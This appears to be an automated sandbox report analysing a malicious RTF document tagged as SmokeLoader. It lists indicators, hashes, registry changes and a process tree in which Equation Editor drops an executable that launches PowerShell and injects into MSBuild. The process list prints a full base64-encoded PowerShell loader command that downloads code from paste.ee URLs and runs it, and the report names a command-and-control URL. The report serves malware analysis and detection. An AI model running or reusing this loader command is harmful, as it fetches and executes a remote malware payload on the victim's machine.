Analysis
-
max time kernel
1801s -
max time network
1571s -
platform
windows7_x64 -
resource
win7 -
submitted
28-10-2020 16:00
Static task
static1
Behavioral task
behavioral1
Sample
asdf.rtf
Resource
win7
General
-
Target
asdf.rtf
-
Size
2.3MB
-
MD5
c99321eebd53d1881ced20ddd1dbfda0
-
SHA1
db66a0c3cd32f56f68f9386cf017e39cce3dbe60
-
SHA256
88c9417d5fc9539878eff56ea8d6105711a383a15a1dc54b6918016f25880120
-
SHA512
2b3d20fc907302b9ea7bd893f684a12739ffd67586a649ebcff0a39619374fe0bb90ccb6cb055e1788c950ef58dc7547454cd1ad348a483b8400ab86509161bb
Malware Config
Extracted
httPs://paste.ee/r/DUMRL
httPs://paste.ee/r/wWuSK
Extracted
smokeloader
2020
https://www.bristell.com/files/index.php
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Blocklisted process makes network request 4 IoCs
Processes:
EQNEDT32.EXEpowershell.exeflow pid process 6 1204 EQNEDT32.EXE 8 1204 EQNEDT32.EXE 10 1204 EQNEDT32.EXE 16 772 powershell.exe -
Executes dropped EXE 4 IoCs
Processes:
908.exeuuiicfiuuiicfiuuiicfipid process 328 908.exe 288 uuiicfi 616 uuiicfi 1148 uuiicfi -
Processes:
yara_rule upx \Users\Public\908.exe upx C:\Users\Public\908.exe upx C:\Users\Public\908.exe upx -
Loads dropped DLL 2 IoCs
Processes:
EQNEDT32.EXEMSBuild.exepid process 1204 EQNEDT32.EXE 268 MSBuild.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 772 set thread context of 268 772 powershell.exe MSBuild.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
MSBuild.exedescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MSBuild.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MSBuild.exe -
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Processes:
WINWORD.EXEdescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1508 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exeMSBuild.exepid process 1592 powershell.exe 1592 powershell.exe 772 powershell.exe 772 powershell.exe 772 powershell.exe 772 powershell.exe 268 MSBuild.exe 268 MSBuild.exe 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 -
Suspicious behavior: MapViewOfSection 64 IoCs
Processes:
MSBuild.exepid process 268 MSBuild.exe 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 1260 -
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1592 powershell.exe Token: SeDebugPrivilege 772 powershell.exe Token: SeShutdownPrivilege 1260 Token: SeShutdownPrivilege 1260 Token: SeShutdownPrivilege 1260 Token: SeShutdownPrivilege 1260 Token: SeShutdownPrivilege 1260 Token: SeShutdownPrivilege 1260 Token: SeShutdownPrivilege 1260 -
Suspicious use of FindShellTrayWindow 34 IoCs
Processes:
908.exepid process 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 1260 1260 1260 1260 1260 1260 -
Suspicious use of SendNotifyMessage 32 IoCs
Processes:
908.exepid process 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 328 908.exe 1260 1260 1260 1260 -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 1508 WINWORD.EXE 1508 WINWORD.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
WINWORD.EXEEQNEDT32.EXE908.exepowershell.exepowershell.exetaskeng.exedescription pid process target process PID 1508 wrote to memory of 1840 1508 WINWORD.EXE splwow64.exe PID 1508 wrote to memory of 1840 1508 WINWORD.EXE splwow64.exe PID 1508 wrote to memory of 1840 1508 WINWORD.EXE splwow64.exe PID 1508 wrote to memory of 1840 1508 WINWORD.EXE splwow64.exe PID 1204 wrote to memory of 328 1204 EQNEDT32.EXE 908.exe PID 1204 wrote to memory of 328 1204 EQNEDT32.EXE 908.exe PID 1204 wrote to memory of 328 1204 EQNEDT32.EXE 908.exe PID 1204 wrote to memory of 328 1204 EQNEDT32.EXE 908.exe PID 328 wrote to memory of 1592 328 908.exe powershell.exe PID 328 wrote to memory of 1592 328 908.exe powershell.exe PID 328 wrote to memory of 1592 328 908.exe powershell.exe PID 328 wrote to memory of 1592 328 908.exe powershell.exe PID 1592 wrote to memory of 772 1592 powershell.exe powershell.exe PID 1592 wrote to memory of 772 1592 powershell.exe powershell.exe PID 1592 wrote to memory of 772 1592 powershell.exe powershell.exe PID 1592 wrote to memory of 772 1592 powershell.exe powershell.exe PID 772 wrote to memory of 1996 772 powershell.exe MSBuild.exe PID 772 wrote to memory of 1996 772 powershell.exe MSBuild.exe PID 772 wrote to memory of 1996 772 powershell.exe MSBuild.exe PID 772 wrote to memory of 1996 772 powershell.exe MSBuild.exe PID 772 wrote to memory of 268 772 powershell.exe MSBuild.exe PID 772 wrote to memory of 268 772 powershell.exe MSBuild.exe PID 772 wrote to memory of 268 772 powershell.exe MSBuild.exe PID 772 wrote to memory of 268 772 powershell.exe MSBuild.exe PID 772 wrote to memory of 268 772 powershell.exe MSBuild.exe PID 772 wrote to memory of 268 772 powershell.exe MSBuild.exe PID 772 wrote to memory of 268 772 powershell.exe MSBuild.exe PID 1260 wrote to memory of 1052 1260 explorer.exe PID 1260 wrote to memory of 1052 1260 explorer.exe PID 1260 wrote to memory of 1052 1260 explorer.exe PID 1260 wrote to memory of 1052 1260 explorer.exe PID 1260 wrote to memory of 1052 1260 explorer.exe PID 1260 wrote to memory of 432 1260 explorer.exe PID 1260 wrote to memory of 432 1260 explorer.exe PID 1260 wrote to memory of 432 1260 explorer.exe PID 1260 wrote to memory of 432 1260 explorer.exe PID 1260 wrote to memory of 1048 1260 explorer.exe PID 1260 wrote to memory of 1048 1260 explorer.exe PID 1260 wrote to memory of 1048 1260 explorer.exe PID 1260 wrote to memory of 1048 1260 explorer.exe PID 1260 wrote to memory of 1048 1260 explorer.exe PID 1260 wrote to memory of 1332 1260 explorer.exe PID 1260 wrote to memory of 1332 1260 explorer.exe PID 1260 wrote to memory of 1332 1260 explorer.exe PID 1260 wrote to memory of 1332 1260 explorer.exe PID 1260 wrote to memory of 1596 1260 explorer.exe PID 1260 wrote to memory of 1596 1260 explorer.exe PID 1260 wrote to memory of 1596 1260 explorer.exe PID 1260 wrote to memory of 1596 1260 explorer.exe PID 1260 wrote to memory of 1596 1260 explorer.exe PID 1780 wrote to memory of 288 1780 taskeng.exe uuiicfi PID 1780 wrote to memory of 288 1780 taskeng.exe uuiicfi PID 1780 wrote to memory of 288 1780 taskeng.exe uuiicfi PID 1780 wrote to memory of 288 1780 taskeng.exe uuiicfi PID 1260 wrote to memory of 1096 1260 explorer.exe PID 1260 wrote to memory of 1096 1260 explorer.exe PID 1260 wrote to memory of 1096 1260 explorer.exe PID 1260 wrote to memory of 1096 1260 explorer.exe PID 1260 wrote to memory of 568 1260 explorer.exe PID 1260 wrote to memory of 568 1260 explorer.exe PID 1260 wrote to memory of 568 1260 explorer.exe PID 1260 wrote to memory of 568 1260 explorer.exe PID 1260 wrote to memory of 568 1260 explorer.exe PID 1260 wrote to memory of 432 1260 explorer.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\asdf.rtf"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1508 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:1840
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:1204 -
C:\Users\Public\908.exeC:\Users\Public\908.exe2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:328 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -executionpolicy bypass C:\Users\Admin\AppData\Local\Temp\duOrFjsdY.ps13⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1592 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -w 1 /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8ARABVAE0AUgBMACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAF4AIgAsACAAIgA0ADQAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAKgAiACwAIAAiADQAOAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAjACIALAAgACIANwA4ACIAKQB8AEkARQBYADsAWwBCAHkAdABlAFsAXQBdACQAZgA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwBzACcAIAArACAAWwBDAGgAYQByAF0ANQA4ACAAKwAgACcALwAvAHAAYQBzAHQAZQAuAGUAZQAvAHIALwB3AFcAdQBTAEsAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAJAAkACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAQwAuAE0AXQA6ADoAUgAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAGYAKQA=4⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:772 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵PID:1996
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:268
-
-
-
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1052
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:432
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1048
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:1332
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1596
-
C:\Windows\system32\taskeng.exetaskeng.exe {C6FE7DD7-50BE-48AB-9CC7-612F964D9CA1} S-1-5-21-4210623931-3856158591-1213714290-1000:VDIPBIOF\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:1780 -
C:\Users\Admin\AppData\Roaming\uuiicfiC:\Users\Admin\AppData\Roaming\uuiicfi2⤵
- Executes dropped EXE
PID:288
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:1096
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:568
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:432
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1784
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:324
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1720
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:1820
-
C:\Windows\system32\taskeng.exetaskeng.exe {C15EE2B9-769A-4241-8B0D-BFE676C299DE} S-1-5-21-4210623931-3856158591-1213714290-1000:VDIPBIOF\Admin:Interactive:[1]1⤵PID:960
-
C:\Users\Admin\AppData\Roaming\uuiicfiC:\Users\Admin\AppData\Roaming\uuiicfi2⤵
- Executes dropped EXE
PID:616
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:560
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:1896
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:188
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:976
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1844
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:920
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1832
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:1716
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1488
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1856
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1560
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:572
-
C:\Windows\system32\taskeng.exetaskeng.exe {BAC70FAC-254C-4593-B6AF-9F0D0E126843} S-1-5-21-4210623931-3856158591-1213714290-1000:VDIPBIOF\Admin:Interactive:[1]1⤵PID:1556
-
C:\Users\Admin\AppData\Roaming\uuiicfiC:\Users\Admin\AppData\Roaming\uuiicfi2⤵
- Executes dropped EXE
PID:1148
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1208
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:1500
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:560
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:1644
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1572
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:1952
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1380
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:1776
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1528
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1680
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1676
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:308
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD585c02975dda78cc5c3b88c5d34cc7c26
SHA1804d4d793f5bfff48341e967f9ef9f41a1debca6
SHA256dea4a2831c59f4bb6b8ca3238ce9bec2391067c976e946773c056c0b8ebe8239
SHA5121d7f442f45bec5498560d3b1d10d7f0a00e7aac92a90ce9ef1b6668e32a30eaa0f15e3cef72919a125c526b34508fe5e4397808b70cf07f7917999fe229eeb1e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1e1c900c-0d58-484d-b929-67e01a0727ef
MD55e3c7184a75d42dda1a83606a45001d8
SHA194ca15637721d88f30eb4b6220b805c5be0360ed
SHA2568278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59
SHA512fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7eddb008-03b2-44b7-ba83-b7fd16fb2e89
MD502ff38ac870de39782aeee04d7b48231
SHA10390d39fa216c9b0ecdb38238304e518fb2b5095
SHA256fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876
SHA51224a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8e79d91b-e812-4269-8293-6068b9bab0d3
MD5df44874327d79bd75e4264cb8dc01811
SHA11396b06debed65ea93c24998d244edebd3c0209d
SHA25655de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181
SHA51295dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9eac8395-fc75-45b8-9c48-bfc1db7c3c0f
MD5be4d72095faf84233ac17b94744f7084
SHA1cc78ce5b9c57573bd214a8f423ee622b00ebb1ec
SHA256b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc
SHA51243856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a426aac7-daac-4445-a1d2-56718314378c
MD5a725bb9fafcf91f3c6b7861a2bde6db2
SHA18bb5b83f3cc37ff1e5ea4f02acae38e72364c114
SHA25651651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431
SHA5121c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d6289801-864a-4184-a547-2523e131d25f
MD5b6d38f250ccc9003dd70efd3b778117f
SHA1d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a
SHA2564de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265
SHA51267d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fc7c09f4-994b-4a9f-927f-42cf9b846b51
MD575a8da7754349b38d64c87c938545b1b
SHA15c28c257d51f1c1587e29164cc03ea880c21b417
SHA256bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96
SHA512798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ff960bfe-cfc4-4a4c-8e9b-ab6e5dcd6d96
MD5597009ea0430a463753e0f5b1d1a249e
SHA14e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62
SHA2563fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d
SHA5125d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5dbb685a6942d1834479b57f1ca3e6871
SHA101b785da0930224565a83ce9938f7ab08da5cf41
SHA2567d5c6d8dce30959241989e822922356e6359e90620f875dbedcb134e23def9c9
SHA5120cd4437ac14ff3db55311f0a1187f7dadb8405ace0f5b4f6526cadeade859e8d6c936a8035d16196655d772bdf657bcad84c04d298d5ea57e42ec52351aeddcc
-
MD5
d96d0044b45279cc88ede52fbac0ad7a
SHA1e9c86777e121de0d25cabd37f2848afb2105391a
SHA2562ef444fec4caa5020092bad15c0698efaa15fb85107b278b3ead3aa4ea658d60
SHA5126eea23740bdb1738709d1d546b2058f55fcd902dbf508ebdbba972669961340e79979813499eb313da954962315ac3bdb282a0642098089392e80710d5335db9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5ccabb92ed0cca61129ef38c3be75eff9
SHA1163c7448c7004deaeeb7d5d95ee85c79743aae81
SHA256c6d8c765f69b9a1ac385d705faa248c4f396a3186f61348ba0b091f5488f697a
SHA51250ca7140281ec1bfb2d4e227a242edd35fcf11c0cdf017be603700c50e6c9168c0eaf36043826677e947f95ecd6a945c2a08eaf087efd5ea78be3d43a68ac656
-
MD5
9af17c8393f0970ee5136bd3ffa27001
SHA14b285b72c1a11285a25f31f2597e090da6bbc049
SHA25671d6a7a3fe5f8dc878cd5bdeca0e09177efb85c01e9a8a10a95262cabefaa019
SHA512b90f7de7d5ce72dccb264c7ba609e173c529b9d99ed9a63f88632bc58b1a994bbb727365f519c73b979f8918bd6de3c39a9f0347eb3a4bccdce4b2772a6516a3
-
MD5
9af17c8393f0970ee5136bd3ffa27001
SHA14b285b72c1a11285a25f31f2597e090da6bbc049
SHA25671d6a7a3fe5f8dc878cd5bdeca0e09177efb85c01e9a8a10a95262cabefaa019
SHA512b90f7de7d5ce72dccb264c7ba609e173c529b9d99ed9a63f88632bc58b1a994bbb727365f519c73b979f8918bd6de3c39a9f0347eb3a4bccdce4b2772a6516a3
-
MD5
9af17c8393f0970ee5136bd3ffa27001
SHA14b285b72c1a11285a25f31f2597e090da6bbc049
SHA25671d6a7a3fe5f8dc878cd5bdeca0e09177efb85c01e9a8a10a95262cabefaa019
SHA512b90f7de7d5ce72dccb264c7ba609e173c529b9d99ed9a63f88632bc58b1a994bbb727365f519c73b979f8918bd6de3c39a9f0347eb3a4bccdce4b2772a6516a3
-
MD5
9af17c8393f0970ee5136bd3ffa27001
SHA14b285b72c1a11285a25f31f2597e090da6bbc049
SHA25671d6a7a3fe5f8dc878cd5bdeca0e09177efb85c01e9a8a10a95262cabefaa019
SHA512b90f7de7d5ce72dccb264c7ba609e173c529b9d99ed9a63f88632bc58b1a994bbb727365f519c73b979f8918bd6de3c39a9f0347eb3a4bccdce4b2772a6516a3
-
MD5
69634bfa7067cb53b5da3d65be5e469b
SHA104ed976bbfad41aea52d682b9511e02930322662
SHA256f20f685cf0b643237c58a99ffd2abf32cbad0b5f6bd7fccb1d252a7227ae48e4
SHA512ce4cce407ebed03ffff38b66e5207e2929158466a0bc3210c99f978bfd37ff741976b166a0bfaaf6f9967e56fdf17abf3c6ac6b17007c4e28404def69801ff36
-
MD5
69634bfa7067cb53b5da3d65be5e469b
SHA104ed976bbfad41aea52d682b9511e02930322662
SHA256f20f685cf0b643237c58a99ffd2abf32cbad0b5f6bd7fccb1d252a7227ae48e4
SHA512ce4cce407ebed03ffff38b66e5207e2929158466a0bc3210c99f978bfd37ff741976b166a0bfaaf6f9967e56fdf17abf3c6ac6b17007c4e28404def69801ff36
-
MD5
d124f55b9393c976963407dff51ffa79
